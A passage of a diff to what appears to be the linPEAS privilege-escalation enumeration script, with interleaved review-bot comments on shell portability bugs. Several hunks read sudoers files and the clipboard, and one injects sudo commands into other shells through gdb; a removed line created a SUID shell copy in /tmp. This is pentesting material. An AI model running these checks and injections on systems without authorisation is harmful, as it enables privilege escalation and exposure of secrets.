| sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + crontab -l -u "$USER" 2>/dev/null | tr -d "\r" ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ 2>/dev/null #MacOS paths echo "" #-- PCS) Services printf $Y"[+] "$GREEN"Services\n"$NC printf $B"[i] "$Y"Search for outdated versions\n"$NC - (service --status-all || chkconfig --list || rc-status) 2>/dev/null || launchctl list || echo_not_found "service|chkconfig|rc-status" + (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" echo "" #-- PSC) systemd PATH printf $Y"[+] "$GREEN"Systemd PATH\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths\n"$NC - systemctl show-environment 2>/dev/null | grep "PATH" | sed -E "s,$Wfolders\|\./\|\.:\|:\.,${C}[1;31;103m&${C}[0m,g" + systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${C}[1;31;103m&${C}[0m,g" WRITABLESYSTEMDPATH=`systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders"` echo "" 
@@ -1170,11 +1292,11 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then #TODO: .service files in MACOS are folders printf $Y"[+] "$GREEN"Analyzing .service files\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#services\n"$NC - services=$(echo "$FIND_ETC $FIND_LIB $FIND_RUN $FIND_USR $FIND_SYSTEMD $FIND_SYSTEM $FIND_PRIVATE $FIND_VAR $FIND_SYS $FIND_SNAP" | grep -E '\.service') + services=$(echo "$FIND_ETC\n$FIND_LIB\n$FIND_RUN\n$FIND_USR\n$FIND_SYSTEMD\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYS\n$FIND_SNAP" | grep -E '\.service') printf "$services\n" | while read s; do if [ ! -O "$s" ]; then #Remove services that belongs to the current user if [ -w "$s" ] && [ -f "$s" ]; then - echo "$s" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,g" + echo "$s" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,g" fi servicebinpaths="`grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' \"$s\" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,'`" #Get invoked paths printf "$servicebinpaths\n" | while read sp; do 
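Review bot: The new `services=$(echo "$FIND_ETC\n$FIND_LIB\n..." | grep -E '\.service')` relies on `echo` turning `\n` into a newline, which dash's echo does but bash's builtin does not without `-e` or `xpg_echo`; if the script runs under bash, the last path of one variable and the first of the next are glued into one `a.service\nb.service` line, which then fails the `-w`/`-f` tests in the loop below and is neither flagged nor analyzed. `printf` is unambiguous here: `services=$(printf "%s\n" "$FIND_ETC" "$FIND_LIB" "$FIND_RUN" "$FIND_USR" "$FIND_SYSTEMD" "$FIND_SYSTEM" "$FIND_PRIVATE" "$FIND_VAR" "$FIND_SYS" "$FIND_SNAP" | grep -E '\.service')`. The same `\n` join appears for the `.timer` and `.socket` lists and for `backup_folders`, so they should change together. The `while read s` loop that consumes `$services` continues past the end of this hunk.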
@@ -1186,29 +1308,29 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then relpath2="`grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' \"$s\" 2>/dev/null | grep -Ev \"/[a-zA-Z0-9_]+/\"`" if [ "$relpath1" ] || [ "$relpath2" ]; then if [ "$WRITABLESYSTEMDPATH" ]; then - echo "$s is executing some relative path" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; + echo "$s is executing some relative path" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; else echo "$s is executing some relative path" fi fi fi done - if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -E "s,.*,${C}[1;32m&${C}[0m,"; fi + if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${C}[1;32m&${C}[0m,"; fi echo "" #-- PSC) Timers printf $Y"[+] "$GREEN"System timers\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers\n"$NC - (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -E "s,$timersG,${C}[1;32m&${C}[0m,") || echo_not_found + (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${C}[1;32m&${C}[0m,") || echo_not_found echo "" #-- PSC) .timer files printf $Y"[+] "$GREEN"Analyzing .timer files\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers\n"$NC - timers=$(echo "$FIND_ETC $FIND_LIB $FIND_RUN $FIND_USR $FIND_SYSTEMD $FIND_SYSTEM $FIND_PRIVATE $FIND_VAR $FIND_SYS $FIND_SNAP" | grep -E '\.timer') + timers=$(echo "$FIND_ETC\n$FIND_LIB\n$FIND_RUN\n$FIND_USR\n$FIND_SYSTEMD\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYS\n$FIND_SNAP" | grep -E '\.timer') printf "$timers\n" | while read t; do if [ -w "$t" ]; then - echo "$t" | sed -E "s,.*,${C}[1;31m&${C}[0m,g" + echo "$t" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" fi timerbinpaths="`grep -Po '^Unit=*(.*?$)' \"$t\" 2>/dev/null | cut -d '=' -f2`" printf "$timerbinpaths\n" | while read tb; do 
@@ -1227,7 +1349,7 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then
 #TODO: .socket files in MACOS are folders
 printf $Y"[+] "$GREEN"Analyzing .socket files\n"$NC
 printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets\n"$NC
- sockets=$(echo "$FIND_ETC $FIND_LIB $FIND_RUN $FIND_USR $FIND_SYSTEMD $FIND_SYSTEM $FIND_PRIVATE $FIND_VAR $FIND_SYS $FIND_SNAP" | grep -E '\.socket')
+ sockets=$(echo "$FIND_ETC\n$FIND_LIB\n$FIND_RUN\n$FIND_USR\n$FIND_SYSTEMD\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYS\n$FIND_SNAP" | grep -E '\.socket')
 printf "$sockets\n" | while read s; do
 if [ -w "$s" ] && [ -f "$s" ]; then
 echo "Writable .socket file: $s" | sed "s,/.*,${C}[1;31m&${C}[0m,g"
@@ -1247,6 +1369,9 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then
 if [ -w "/var/run/docker.sock" ]; then
 echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${C}[1;31;103m&${C}[0m,g"
 fi
+ if [ -w "/run/docker.sock" ]; then
+ echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${C}[1;31;103m&${C}[0m,g"
+ fi
 done
 echo ""
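Review bot: The added `/run/docker.sock` branch pipes its message through `sed "s,/var/run/docker.sock is writable,...` copied from the branch above, so the pattern never matches the text it is given and the new finding prints without the highlight the first branch gets; change it to `sed "s,/run/docker.sock is writable,${C}[1;31;103m&${C}[0m,g"`. Where `/var/run` is a symlink to `/run`, both branches fire for the same socket, so a `[ ! -L /var/run ]` guard on the second check, or a single check on the resolved path, would avoid the duplicate line. The loop closed by the trailing `done` starts before this hunk.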
@@ -1257,7 +1382,7 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then
 socketcurl="`curl --max-time 2 --unix-socket \"$s\" http:/index 2>/dev/null`"
 if [ $? -eq 0 ]; then
 owner="`ls -l \"$s\" | cut -d ' ' -f 3`"
- echo "Socket $s owned by $owner uses HTTP. Response to /index:" | sed -E "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -E "s,$groupsVB,${C}[1;31m&${C}[0m,g" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -E "s,$knw_grps,${C}[1;32m&${C}[0m,g" | sed -E "s,$idB,${C}[1;31m&${C}[0m,g"
+ echo "Socket $s owned by $owner uses HTTP. Response to /index:" | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$groupsVB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$knw_grps,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$idB,${C}[1;31m&${C}[0m,g"
 echo "$socketcurl"
 fi
 done
@@ -1271,20 +1396,20 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then printf "$dbusfols\n" | while read d; do for f in $d/*; do if [ -w "$f" ]; then - echo "Writable $f" | sed -E "s,.*,${C}[1;31m&${C}[0m,g" + echo "Writable $f" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" fi genpol=`grep "" "$f" 2>/dev/null` - if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -E "s,$mygroups,${C}[1;31m&${C}[0m,g"; fi + if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$mygroups,${C}[1;31m&${C}[0m,g"; fi #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${C}[1;31m&${C}[0m,g"; fi userpol=`grep "/dev/null | grep -v "root"` - if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -E "s,$mygroups,${C}[1;31m&${C}[0m,g"; fi + if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$mygroups,${C}[1;31m&${C}[0m,g"; fi #for g in `groups`; do # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${C}[1;31m&${C}[0m,g"; fi #done grppol=`grep "/dev/null | grep -v "root"` - if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -E 
"s,$mygroups,${C}[1;31m&${C}[0m,g"; fi + if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$mygroups,${C}[1;31m&${C}[0m,g"; fi #TODO: identify allows in context="default" done @@ -1297,7 +1422,7 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then dbuslist=$(busctl list 2>/dev/null) if [ "$dbuslist" ]; then busctl list | while read line; do - echo "$line" | sed -E "s,$dbuslistG,${C}[1;32m&${C}[0m,g"; + echo "$line" | sed -${E} "s,$dbuslistG,${C}[1;32m&${C}[0m,g"; if [ ! "`echo \"$line\" | grep -E \"$dbuslistG\"`" ]; then srvc_object=`echo $line | cut -d " " -f1` srvc_object_info=`busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' '` @@ -1320,7 +1445,7 @@ if [ "`echo $CHECKS | grep Net`" ]; then ########################################### #---------) Network Information (---------# ########################################### - printf $B"===================================( "$GREEN"Network Information"$B" )====================================\n"$NC + printf $B"═══════════════════════════════════╣ "$GREEN"Network Information"$B" ╠════════════════════════════════════\n"$NC #-- NI) Hostname, hosts and DNS printf $Y"[+] "$GREEN"Hostname, hosts and DNS\n"$NC @@ -1353,7 +1478,7 @@ if [ "`echo $CHECKS | grep Net`" ]; then #-- NI) Ports printf $Y"[+] "$GREEN"Active Ports\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports\n"$NC - (netstat -punta || ss --ntpu || (netstat -a -p tcp && netstat -a -p udp) | grep -i listen) 2>/dev/null | sed -E "s,127.0.[0-9]+.[0-9]+,${C}[1;31m&${C}[0m," + ((netstat -punta || ss -ntpu || (netstat -a -p tcp && netstat -a -p udp)) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+,${C}[1;31m&${C}[0m," echo "" #-- NI) tcpdump 
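Review bot: The regrouped `((netstat -punta || ss -ntpu || (netstat -a -p tcp && netstat -a -p udp)) | grep -i listen)` now applies the `listen` filter to every branch, whereas the old precedence filtered only the BSD `netstat -a -p tcp/udp` fallback. `ss` without `-l` or `-a` lists only non-listening sockets, so on hosts that lack `netstat` the grep removes every line and the Active Ports section comes out empty; UDP sockets carry no LISTEN state in either tool and vanish from the Linux output too, as do the established connections `netstat -punta` used to show. Keep the filter on the fallback only and ask `ss` for all sockets: `((netstat -punta || ss -antpu || ((netstat -a -p tcp && netstat -a -p udp) | grep -i listen)) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+,${C}[1;31m&${C}[0m,"`.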
@@ -1361,18 +1486,18 @@ if [ "`echo $CHECKS | grep Net`" ]; then timeout 1 tcpdump >/dev/null 2>&1 if [ $? -eq 124 ]; then #If 124, then timed out == It worked printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing\n"$NC - echo "You can sniff with tcpdump!" | sed -E "s,.*,${C}[1;31m&${C}[0m," + echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi echo "" #-- NI) Internet access - if ! [ "$SUPERFAST" ] && ! [ "$NOTEXPORT" ] && [ -f "/bin/bash" ]; then + if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then printf $Y"[+] "$GREEN"Internet Access?\n"$NC - check_tcp_80 & - check_tcp_443 & - check_icmp & - timeout 10 /bin/bash -c '(( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd ) 3>/dev/udp/1.11.1.1/53 && echo "DNS available" || echo "DNS not available") 2>/dev/null | grep "available"' 2>/dev/null & + check_tcp_80 2>/dev/null & + check_tcp_443 2>/dev/null & + check_icmp 2>/dev/null & + check_dns 2>/dev/null & wait echo "" fi 
@@ -1385,27 +1510,31 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then ########################################### #----------) Users Information (----------# ########################################### - printf $B"====================================( "$GREEN"Users Information"$B" )=====================================\n"$NC + printf $B"════════════════════════════════════╣ "$GREEN"Users Information"$B" ╠════════════════════════════════════\n"$NC #-- UI) My user printf $Y"[+] "$GREEN"My user\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#users\n"$NC - (id || (whoami && groups)) 2>/dev/null | sed -E "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -E "s,$groupsVB,${C}[1;31;103m&${C}[0m,g" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -E "s,$knw_grps,${C}[1;32m&${C}[0m,g" | sed -E "s,$idB,${C}[1;31m&${C}[0m,g" + (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$groupsVB,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$knw_grps,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$idB,${C}[1;31m&${C}[0m,g" echo "" #-- UI) PGP keys? 
printf $Y"[+] "$GREEN"Do I have PGP keys?\n"$NC - gpg --list-keys 2>/dev/null || echo_not_found "gpg" + command -v gpg 2>/dev/null || echo_not_found "gpg" + gpg --list-keys 2>/dev/null + command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" + netpgpkeys --list-keys 2>/dev/null + command -v netpgp 2>/dev/null || echo_not_found "netpgp" echo "" #-- UI) Clipboard and highlighted text printf $Y"[+] "$GREEN"Clipboard or highlighted text?\n"$NC - if [ `which xclip 2>/dev/null` ]; then - echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null` | sed -E "s,$pwd_inside_history,${C}[1;31m&${C}[0m," - echo "Highlighted text: "`xclip -o 2>/dev/null` | sed -E "s,$pwd_inside_history,${C}[1;31m&${C}[0m," - elif [ `which xsel 2>/dev/null` ]; then - echo "Clipboard: "`xsel -ob 2>/dev/null` | sed -E "s,$pwd_inside_history,${C}[1;31m&${C}[0m," - echo "Highlighted text: "`xsel -o 2>/dev/null` | sed -E "s,$pwd_inside_history,${C}[1;31m&${C}[0m," + if [ `command -v xclip 2>/dev/null` ]; then + echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${C}[1;31m&${C}[0m," + echo "Highlighted text: "`xclip -o 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${C}[1;31m&${C}[0m," + elif [ `command -v xsel 2>/dev/null` ]; then + echo "Clipboard: "`xsel -ob 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${C}[1;31m&${C}[0m," + echo "Highlighted text: "`xsel -o 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${C}[1;31m&${C}[0m," else echo_not_found "xsel and xclip" fi echo "" 
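Review bot: In the PGP keys hunk `gpg --list-keys 2>/dev/null` runs unconditionally after the `command -v gpg || echo_not_found` line, and when gpg is present a first invocation creates `~/.gnupg` (and may start an agent), so an otherwise read-only enumeration leaves a filesystem artifact behind. Tie the call to the existence check and to an existing keyring: `if command -v gpg >/dev/null 2>&1 && [ -d "$HOME/.gnupg" ]; then gpg --list-keys 2>/dev/null; else echo_not_found "gpg"; fi`. `command -v gpg` also prints the binary path to stdout, which looks intentional but could be stated in a comment, and `netpgp` gets an existence check with nothing executed afterwards. The `command -v xclip`/`xsel` tests keep the unquoted backtick pattern, which breaks if the resolved path contains spaces.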
@@ -1413,49 +1542,50 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then #-- UI) Sudo -l printf $Y"[+] "$GREEN"Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid\n"$NC - (echo '' | sudo -S -l | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -E "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed -E "s,$sudoVB,${C}[1;31;103m&${C}[0m,") 2>/dev/null || echo_not_found "sudo" + (echo '' | sudo -S -l | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sudoVB,${C}[1;31;103m&${C}[0m," | sed "s,\!root,${C}[1;31m&${C}[0m,") 2>/dev/null || echo_not_found "sudo" if [ "$PASSWORD" ]; then - (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -E "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed -E "s,$sudoVB,${C}[1;31;103m&${C}[0m,") 2>/dev/null || echo_not_found "sudo" + (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sudoVB,${C}[1;31;103m&${C}[0m,") 2>/dev/null || echo_not_found "sudo" fi - (cat /etc/sudoers | grep -v "^$" | grep -v "#" | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -E "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed "s,pwfeedback,${C}[1;31m&${C}[0m,g" | sed -E "s,$sudoVB,${C}[1;31;103m&${C}[0m,") 2>/dev/null || echo_not_found "/etc/sudoers" + (cat /etc/sudoers | grep -v "^$" | grep -v "#" | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed "s,pwfeedback,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sudoVB,${C}[1;31;103m&${C}[0m,") 2>/dev/null || echo_not_found "/etc/sudoers" if [ -w '/etc/sudoers.d/' ]; then - echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -E 
"s,.*,${C}[1;31;103m&${C}[0m," + echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," fi for filename in '/etc/sudoers.d/*'; do if [ -r "$filename" ]; then - echo "Sudoers file: $filename is readable" | sed -E "s,.*,${C}[1;31m&${C}[0m,g" - cat "$filename" | grep -v "^$" | grep -v "#" | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -E "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed "s,pwfeedback,${C}[1;31m&${C}[0m,g" | sed -E "s,$sudoVB,${C}[1;31;103m&${C}[0m," + echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" + cat "$filename" | grep -v "^$" | grep -v "#" | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed "s,pwfeedback,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sudoVB,${C}[1;31;103m&${C}[0m," fi done echo "" #-- UI) Sudo tokens printf $Y"[+] "$GREEN"Checking sudo tokens\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid\n"$NC + printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens\n"$NC ptrace_scope="`cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null`" if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "/proc/sys/kernel/yama/ptrace_scope is enabled (0)" | sed "s,0,${C}[1;31m&${C}[0m,g"; else echo "/proc/sys/kernel/yama/ptrace_scope is not enabled ($ptrace_scope)" | sed "s,is not enabled,${C}[1;32m&${C}[0m,g"; fi - is_gdb="`which gdb 2>/dev/null`" - if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -E "s,.*,${C}[1;31m&${C}[0m,g"; + is_gdb="`command -v gdb 2>/dev/null`" + if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g"; else echo "gdb wasn't found in PATH" | sed "s,gdb,${C}[1;32m&${C}[0m,g"; fi if [ ! 
"$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then echo "Checking for sudo tokens in other shells owned by current user" for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) - echo 'call system("echo | sudo -S cp /bin/sh /tmp/shrndom >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/shrndom >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 + echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 done - if [ -f "/tmp/shrndom" ]; then - echo "Sudo tokens exploit worked, you can escalate privileges using '/tmp/shrndom -p'" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; + if [ -f "/tmp/shrndom32r2r" ]; then + rm /tmp/shrndom32r2r 2>/dev/null + echo "Sudo token reuse exploit worked! (see link)" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; else echo "The escalation didn't work... 
(try again later?)" fi fi echo "" #-- UI) Doas - printf $Y"[+] "$GREEN"Checking /etc/doas.conf\n"$NC - if [ "`cat /etc/doas.conf 2>/dev/null`" ]; then cat /etc/doas.conf 2>/dev/null | sed -E "s,$sh_usrs,${C}[1;31m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," | sed "s,nopass,${C}[1;31m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,$USER,${C}[1;31;103m&${C}[0m," + printf $Y"[+] "$GREEN"Checking doas.conf\n"$NC + if [ "`cat /etc/doas.conf "$(dirname $(command -v doas) 2>/dev/null)/doas.conf" "$(dirname $(command -v doas) 2>/dev/null)/../etc/doas.conf" "$(dirname $(command -v doas) 2>/dev/null)/etc/doas.conf" 2>/dev/null`" ]; then cat /etc/doas.conf "$(dirname $(command -v doas))/doas.conf" "$(dirname $(command -v doas))/../etc/doas.conf" "$(dirname $(command -v doas))/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;31m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," | sed "s,nopass,${C}[1;31m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,$USER,${C}[1;31;103m&${C}[0m," else echo_not_found "/etc/doas.conf" fi echo "" 
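Review bot: The doas.conf line evaluates `$(dirname $(command -v doas) ...)` six times, and the three inside the second `cat` have no stderr redirect on `dirname` (the trailing `2>/dev/null` applies to `cat` only), so when `/etc/doas.conf` is readable but doas is not in PATH the script prints `dirname: missing operand`. Compute it once, quoted, before the test: `doas_dir=$(dirname "$(command -v doas 2>/dev/null)" 2>/dev/null)` and then use `"$doas_dir/doas.conf"`, `"$doas_dir/../etc/doas.conf"` and `"$doas_dir/etc/doas.conf"` in both places. The new `sed "s,\!root,..."` passes a literal `\!` to sed; GNU sed appears to treat it as a plain `!`, but it is not a portable BRE escape and `sed "s,!root,..."` says the same thing. The enclosing `UsrI` block starts and ends outside this hunk.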
@@ -1463,11 +1593,77 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then #-- UI) Pkexec policy printf $Y"[+] "$GREEN"Checking Pkexec policy\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2\n"$NC - (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -E "s,$groupsB,${C}[1;31m&${C}[0m," | sed -E "s,$groupsVB,${C}[1;31m&${C}[0m," | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,$USER,${C}[1;31;103m&${C}[0m," | sed -E "s,$Groups,${C}[1;31;103m&${C}[0m,") || echo_not_found "/etc/polkit-1/localauthority.conf.d" + (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} 